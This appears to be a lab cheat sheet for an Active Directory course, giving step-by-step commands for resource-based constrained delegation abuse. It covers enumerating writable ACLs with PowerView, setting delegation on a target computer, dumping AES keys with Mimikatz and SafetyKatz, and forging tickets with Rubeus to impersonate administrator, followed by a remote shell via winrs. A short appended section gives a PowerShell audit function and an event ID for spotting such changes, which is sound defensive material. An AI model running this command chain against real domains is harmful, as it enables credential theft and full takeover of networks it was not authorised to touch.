RBCD -

PowerShell

Enumerate whether we have write permissions over any object

# PowerView
Find-InterestingDomainAcl | ?{$_.identityreferencename -match 'mgmtadmin'}

Configure RBCD on us-helpdesk for student machines

# AD Module
$comps = 'student1$','student2$'
Set-ADComputer -Identity us-helpdesk -PrincipalsAllowedToDelegateToAccount $comps

We can dump the AES keys of the student machines

# Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

# SafetyKatz Binary
SafetyKatz.exe -Command "sekurlsa::ekeys" "exit"

# SafetyKatz Old (For Windows 2020 Server)
SafetyKatz_old.exe -Command "sekurlsa::ekeys" "exit"

Binaries

Rubeus

Use the AES key of studentx$ with Rubeus and access us-helpdesk as ANY user we want

Rubeus.exe s4u /user:student1$ /aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d83b9e6b7fc7897c2 /msdsspn:http/us-helpdesk /impersonateuser:administrator /ptt

Winrs

Now we can connect to the session

winrs -r:us-helpdesk cmd.exe
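
The `Set-ADComputer -PrincipalsAllowedToDelegateToAccount` step above leaves a persistent entry on the target computer object, so it can be audited. The following is an added example, not part of the original page: it flags RBCD principals that are not on an approved list. The function name `Get-RbcdFinding`, the `-Approved` allow-list and the `example.local` domain are assumptions made for illustration.

```powershell
# Added example: audit RBCD entries against an approved list (names are assumptions).
function Get-RbcdFinding {
    [CmdletBinding()]
    param(
        # Objects shaped like Get-ADComputer output with the
        # PrincipalsAllowedToDelegateToAccount property loaded.
        [Parameter(Mandatory, ValueFromPipeline)] $Computer,
        # Hypothetical allow-list: target computer name -> approved principal DNs.
        [hashtable] $Approved = @{}
    )
    process {
        $allowed = @($Approved[$Computer.Name])
        foreach ($dn in @($Computer.PrincipalsAllowedToDelegateToAccount)) {
            # Report every principal that is set but not explicitly approved.
            if ($dn -and $allowed -notcontains $dn) {
                [pscustomobject]@{
                    Target    = $Computer.Name
                    Principal = $dn
                    Finding   = 'Unapproved RBCD principal'
                }
            }
        }
    }
}

# Constructed sample mirroring the page's host names; example.local is a placeholder domain.
$sample = [pscustomobject]@{
    Name = 'us-helpdesk'
    PrincipalsAllowedToDelegateToAccount = @(
        'CN=student1,CN=Computers,DC=example,DC=local',
        'CN=student2,CN=Computers,DC=example,DC=local'
    )
}
$sample | Get-RbcdFinding | Format-Table -AutoSize

# Against a live domain (AD module), query only objects that have the attribute set:
# Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
#     -Properties PrincipalsAllowedToDelegateToAccount | Get-RbcdFinding -Approved $approved
# Clear an unapproved entry after review:
# Set-ADComputer -Identity us-helpdesk -PrincipalsAllowedToDelegateToAccount $null
```

Writes to `msDS-AllowedToActOnBehalfOfOtherIdentity` are also recorded on domain controllers as event ID 5136 when Directory Service Changes auditing and a matching SACL are in place.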
